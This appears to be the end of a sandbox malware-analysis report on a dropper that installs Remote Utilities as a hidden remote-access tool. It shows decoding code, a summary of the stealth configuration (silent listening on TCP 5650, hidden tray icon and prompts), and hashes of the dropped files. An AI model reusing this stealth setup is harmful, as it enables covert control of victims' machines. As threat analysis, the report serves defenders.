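    print(parsed["class"], "port", p["Port"], "SecurityLevel", p["SecurityLevel"], "InternetId", p["UseInetConnection"])
    print("license:", p["Licenses"])
    print("suppressed user-facing cues:", stealth_indicators(p))
```

Decoded, this configuration listens directly on TCP 5650 on any interface with IPv6 enabled, does not use the Internet-ID relay, hides the tray icon and every notification, never asks the user for permission, and carries an embedded licence string that is a pivot for correlating other samples. The same `bytes.fromhex` plus `decode("utf-16-le")` step applies to the "Password" value, which is stored as UTF-16 text; it is cut off in this report, so it cannot be decoded from the page.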
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
-
C:\Users\Admin\AppData\Local\Temp\7ZSfx000.cmd
Filesize 300B
MD5 a47e0180694389aee99b8e5593d5dced
SHA1 925927658ea434258d2e26e8a8aa49a063376076
SHA256 784e908ccad4e77d92be78cc2be0f502d29d0cf6e65331b56720cf0e5ad8b195
SHA512 5d03369ccc1056b50609698d103c4f8694842a29329dccab7fd443af790c2575fd8a1877f78b58f136a428faa6375c51a74f56ab7eded219a58e7e4aef678c41
-
C:\Users\Admin\AppData\Local\Temp\data.exe
Filesize 819KB
MD5 71a944406c89ab321cb1e55c37916d70
SHA1 be6ee2015475bdc1a665b1e6b86e86fcc1025c91
SHA256 4f10edbc89298118923bdb78d1f9e12406b85f34729d8a7ee4dec74f38baaa96
SHA512 9ad4c3ad397643344ff93be905db8ae88afb61c4915873e88332b3fa00021ec5ffa858d32885dd9d374ae3d96d5913eba79f2706aef0b541121f7794d86b1cda
-
C:\Users\Admin\AppData\Local\Temp\hide.exe
Filesize 819KB
MD5 72cc4ab6ee23c79bbeed4c4d7b31f741
SHA1 a5598acb794ebbbad6c0819c20f6f7ed99541e89
SHA256 5be7bb92afe804aa0eaac077f5527f9710c5a3ebd6a7c898d810d3d0388ecf73
SHA512 4840b26abe306cdd05694eb8f0f750e451d83cdb4787b5539d730645ce66b2915b422f9e6be4a22885929fffb3c4b5bb50d9ffa8454045a11b55277c611eabf5
-
C:\Users\Admin\AppData\Local\Temp\nouac.cmd
Filesize 10KB
MD5 6786599aff4e8eb99164bdcbd3e7397b
SHA1 be5daca8309b33310a59d253876ae49e4f26f3d7
SHA256 ccc3c629937f5e26cf78de269feb5739cb2d859ab099312a8089afd98a1b2748
SHA512 5925c7227cacf2a26a26a79e49b4b6aeacda862ef2fff7c879e679f5ee5e0fc87bf33cb0d8b5681b570977bf9d415dbfd2ec31c6fe4a03b90af47fe3a7e8e783
-
C:\Users\Admin\AppData\Local\Temp\rfusclient.exe
Filesize 1.8MB
MD5 3afec4347159849e4ef50d179ff1fed7
SHA1 9b3e00d0a426c622ddc34fbee96595d41bd8db72
SHA256 7ee8203360bf7c114e892664fda4bf66d15db67f6d3192a692b6bc9bc457998f
SHA512 aa99927b06e5fefffee73124ac7ace117b74a4087090109f705c36f44f6beb5e856a55c63238c7ffc73eaba37fbd15f855ca1232cc22371039031abd8fd25bf4
-
C:\Users\Admin\AppData\Local\Temp\rutserv.exe
Filesize 6.3MB
MD5 93a4649d70ce76d6815874fc7a72c6fb
SHA1 1e9f663fd9cb66140001847849ddf0451365233f
SHA256 6dee2aa6f4bd56f39fc6bcc46746373da93674a8cdab0525741432c7d8080203
SHA512 a678b124bb10e83b69ec07939aca9ab249f192585b36eb630f3fe2383584514949eaefc0c611196f3dcdd079c8abee3113c11328fb2a9d231eb48d1d1aa5f0c3
-
C:\Users\Admin\AppData\Local\Temp\uac.cmd
Filesize 10KB
MD5 09bf5a799d46c218ee4d99b9083800ac
SHA1 05927f2aa870eefc12c2883600502e6ed2ff37e5
SHA256 4cbdb4d4bad628128557ff0625f7ecc73801f5ed2324d731c1c70c70ea469e96
SHA512 244a992bb21053ee9045df6f4d6f82d1119859d145c0867badbb1f4af1dd38bfd7105fb0584199098663a019b29db74b649279c946a75b48646707bedbdd4654
-
C:\Windows\spom\rfusclient.exe
Filesize 1.8MB
MD5 3afec4347159849e4ef50d179ff1fed7
SHA1 9b3e00d0a426c622ddc34fbee96595d41bd8db72
SHA256 7ee8203360bf7c114e892664fda4bf66d15db67f6d3192a692b6bc9bc457998f
SHA512 aa99927b06e5fefffee73124ac7ace117b74a4087090109f705c36f44f6beb5e856a55c63238c7ffc73eaba37fbd15f855ca1232cc22371039031abd8fd25bf4
-
C:\Windows\spom\rutserv.exe
Filesize 6.3MB
MD5 93a4649d70ce76d6815874fc7a72c6fb
SHA1 1e9f663fd9cb66140001847849ddf0451365233f
SHA256 6dee2aa6f4bd56f39fc6bcc46746373da93674a8cdab0525741432c7d8080203
SHA512 a678b124bb10e83b69ec07939aca9ab249f192585b36eb630f3fe2383584514949eaefc0c611196f3dcdd079c8abee3113c11328fb2a9d231eb48d1d1aa5f0c3
-
memory/2152-132-0x0000000000400000-0x0000000000425000-memory.dmp
Filesize 148KB
-
memory/2152-137-0x0000000000400000-0x0000000000425000-memory.dmp
Filesize 148KB
-
memory/2244-144-0x0000000000000000-mapping.dmp
memory/2444-164-0x0000000000000000-mapping.dmp
memory/2584-160-0x0000000000000000-mapping.dmp
memory/2620-139-0x0000000000000000-mapping.dmp
memory/2820-143-0x0000000000000000-mapping.dmp
memory/2860-153-0x0000000000000000-mapping.dmp
memory/3096-145-0x0000000000000000-mapping.dmp
memory/3224-159-0x0000000000000000-mapping.dmp
memory/3276-146-0x0000000000000000-mapping.dmp
memory/3488-148-0x0000000000000000-mapping.dmp
memory/3532-158-0x0000000000000000-mapping.dmp
memory/3728-163-0x0000000000000000-mapping.dmp
memory/3804-162-0x0000000000000000-mapping.dmp
memory/3852-133-0x0000000000000000-mapping.dmp
memory/3856-136-0x0000000000000000-mapping.dmp
memory/4316-141-0x0000000000000000-mapping.dmp
memory/4528-142-0x0000000000000000-mapping.dmp
memory/4724-147-0x0000000000000000-mapping.dmp
memory/4776-156-0x0000000000000000-mapping.dmp
memory/4884-161-0x0000000000000000-mapping.dmp
memory/4916-165-0x0000000000000000-mapping.dmp